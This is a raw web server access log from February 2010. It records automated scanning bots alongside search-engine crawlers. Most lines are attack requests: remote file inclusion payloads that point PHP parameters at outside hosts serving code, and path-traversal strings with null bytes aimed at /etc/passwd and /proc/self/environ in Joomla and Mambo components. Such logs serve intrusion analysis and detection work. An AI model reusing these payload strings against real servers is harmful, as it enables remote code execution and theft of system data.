121.97.191.153 - - [05/Feb/2010:21:55:34 -0600] "GET /logs/access_log.1250553600//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:21:55:34 -0600] "GET //citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:21:55:34 -0600] "GET /logs/access_log.1254441600//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:21:55:40 -0600] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:21:55:42 -0600] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:21:55:42 -0600] "GET /logs/access_log.1259107200////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.46.10.12 - - [05/Feb/2010:21:55:46 -0600] "GET /logs/access_log.1258156800//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:21:55:55 -0600] "GET /logs/access_log.1252454400////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.7.219.40 - - [05/Feb/2010:21:56:05 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.7.219.40 - - [05/Feb/2010:21:56:05 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.7.219.40 - - [05/Feb/2010:21:56:05 -0600] "GET /logs/access_log.1257897600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.7.219.40 - - [05/Feb/2010:21:56:16 -0600] "GET /logs/access_log.1253491200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.londonjudo.org.uk/cms/f1??????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.203 - - [05/Feb/2010:21:57:33 -0600] "GET /logs/access_log.1172102400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
221.139.0.75 - - [05/Feb/2010:22:01:26 -0600] "GET /logs/access_log.1251331200//styles.css?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
221.139.0.75 - - [05/Feb/2010:22:01:26 -0600] "GET //styles.css?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
221.139.0.75 - - [05/Feb/2010:22:01:26 -0600] "GET /logs/access_log.1256688000//styles.css?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
221.139.0.75 - - [05/Feb/2010:22:01:26 -0600] "GET /logs//styles.css?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:02:45 -0600] "GET //viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:02:46 -0600] "GET /logs/access_log.1260316800//viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:02:46 -0600] "GET /logs//viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:03:01 -0600] "GET /logs/access_log.1260662400//viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:06:37 -0600] "GET /logs/access_log.1247875200//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:06:37 -0600] "GET //main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:06:37 -0600] "GET /logs/access_log.1251504000//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:06:37 -0600] "GET /logs//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:07:15 -0600] "GET //main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:07:15 -0600] "GET /logs/access_log.1251504000//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:07:15 -0600] "GET /logs//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:22:07:19 -0600] "GET /logs/access_log.1247875200//main.php?x=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.207.102 - - [05/Feb/2010:22:11:30 -0600] "GET /logs/access_log.1181692800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.198 - - [05/Feb/2010:22:14:20 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.25 - - [05/Feb/2010:22:17:00 -0600] "GET /logs/access_log.1130976000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.216.11 - - [05/Feb/2010:22:18:30 -0600] "GET /logs/access_log.1121040000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
109.123.78.44 - - [05/Feb/2010:22:21:34 -0600] "GET /logs/access_log.1232409600/?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.834"
109.123.78.44 - - [05/Feb/2010:22:21:34 -0600] "GET /?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.834"
109.123.78.44 - - [05/Feb/2010:22:21:34 -0600] "GET /logs/access_log.1232409600/?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.834"
109.123.78.44 - - [05/Feb/2010:22:21:36 -0600] "GET /?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.834"
109.123.78.44 - - [05/Feb/2010:22:21:37 -0600] "GET /logs/?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 200 223409 "-""libwww-perl/5.834"
109.123.78.44 - - [05/Feb/2010:22:21:38 -0600] "GET /logs/?include_path=http://www.defusco.com/README.txt?? HTTP/1.1" 200 223409 "-""libwww-perl/5.834"
121.97.191.153 - - [05/Feb/2010:22:22:27 -0600] "GET /logs/access_log.1244678400//guestbook1//admin.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:22:22:29 -0600] "GET /logs//guestbook1//admin.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:22:22:29 -0600] "GET //guestbook1//admin.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:22:22:30 -0600] "GET /logs/access_log.1251417600//guestbook1//admin.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.220.144.69 - - [05/Feb/2010:22:27:01 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:02 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:13 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:16 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:17 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:17 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:19 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:27:20 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.181.7.67 - - [05/Feb/2010:22:27:26 -0600] "GET /logs/access_log.1242691200 HTTP/1.1" 200 524288 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.207.48 - - [05/Feb/2010:22:28:30 -0600] "GET /logs/access_log.1237248000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.158 - - [05/Feb/2010:22:30:01 -0600] "GET /logs/access_log.1252627200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.220.144.69 - - [05/Feb/2010:22:30:27 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:28 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:37 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:37 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:44 -0600] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:44 -0600] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:48 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:48 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:51 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:30:51 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
65.55.106.114 - - [05/Feb/2010:22:33:00 -0600] "GET /logs/access_log.1212796800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.138 - - [05/Feb/2010:22:33:30 -0600] "GET /logs/access_log.1179792000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.220.144.69 - - [05/Feb/2010:22:33:47 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:33:48 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:33:56 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:33:56 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:03 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:03 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:05 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:05 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:09 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:22:34:10 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:37:25 -0600] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:22:37:26 -0600] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
67.218.116.131 - - [05/Feb/2010:22:37:38 -0600] "GET /logs/access_log.1258243200 HTTP/1.0" 200 1081344 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
220.73.144.196 - - [05/Feb/2010:22:38:55 -0600] "GET /?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:38:55 -0600] "GET /logs/access_log.1260316800/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:00 -0600] "GET /logs/access_log.1260316800/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:00 -0600] "GET /?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:01 -0600] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:06 -0600] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:11 -0600] "GET /logs/access_log.1259712000/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:39:16 -0600] "GET /logs/access_log.1259712000/?_zb_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.218.160 - - [05/Feb/2010:22:39:30 -0600] "GET /logs/access_log.1109980800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.73.144.196 - - [05/Feb/2010:22:40:38 -0600] "GET //write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:40:38 -0600] "GET /logs//write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:40:38 -0600] "GET /logs/access_log.1253145600//write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:40:40 -0600] "GET /logs/access_log.1253145600//write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:40:40 -0600] "GET /logs//write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
220.73.144.196 - - [05/Feb/2010:22:40:43 -0600] "GET //write_comment_update.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:22:40:51 -0600] "GET /logs/access_log.1240790400///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:22:40:54 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 223415 "-""Mozilla/5.0"
218.38.136.125 - - [05/Feb/2010:22:40:56 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
83.220.144.69 - - [05/Feb/2010:22:41:23 -0600] "GET //dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""-"
83.220.144.69 - - [05/Feb/2010:22:41:23 -0600] "GET /logs//dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""-"
218.38.136.125 - - [05/Feb/2010:22:41:53 -0600] "GET /logs/access_log.1245110400///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.199.177 - - [05/Feb/2010:22:43:10 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.198.155 - - [05/Feb/2010:22:46:35 -0600] "GET /logs/access_log.1260316800//viewbody.html?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.217.198.155 - - [05/Feb/2010:22:46:35 -0600] "GET //viewbody.html?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
124.217.198.155 - - [05/Feb/2010:22:46:35 -0600] "GET /logs//viewbody.html?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
124.217.198.155 - - [05/Feb/2010:22:46:40 -0600] "GET /logs/access_log.1260662400//viewbody.html?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.55.106.234 - - [05/Feb/2010:22:46:59 -0600] "GET /logs/access_log.1215388800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.38.122 - - [05/Feb/2010:22:49:47 -0600] "GET /index1.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
70.38.38.122 - - [05/Feb/2010:22:49:50 -0600] "GET /logs/index1.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
65.55.106.138 - - [05/Feb/2010:22:50:30 -0600] "GET /?D=D HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.126 - - [05/Feb/2010:22:55:01 -0600] "GET /logs/access_log.1115164800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.111.3.35 - - [05/Feb/2010:22:55:46 -0600] "GET //board/viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:55:46 -0600] "GET /logs/access_log.1260316800//board/viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:55:46 -0600] "GET /logs//board/viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.111.3.35 - - [05/Feb/2010:22:56:14 -0600] "GET /logs/access_log.1260662400//board/viewbody.html?code=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:56:22 -0600] "GET /logs/access_log.1262476800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:56:22 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:56:22 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:57:41 -0600] "GET /logs/access_log.1245628800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:57:55 -0600] "GET /logs/access_log.1262476800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:57:56 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:57:56 -0600] "GET /logs/access_log.1262476800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:57:57 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
68.109.233.150 - - [05/Feb/2010:22:57:57 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:58:02 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:58:03 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.52.233.164 - - [05/Feb/2010:22:58:03 -0600] "GET /logs/access_log.1262476800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
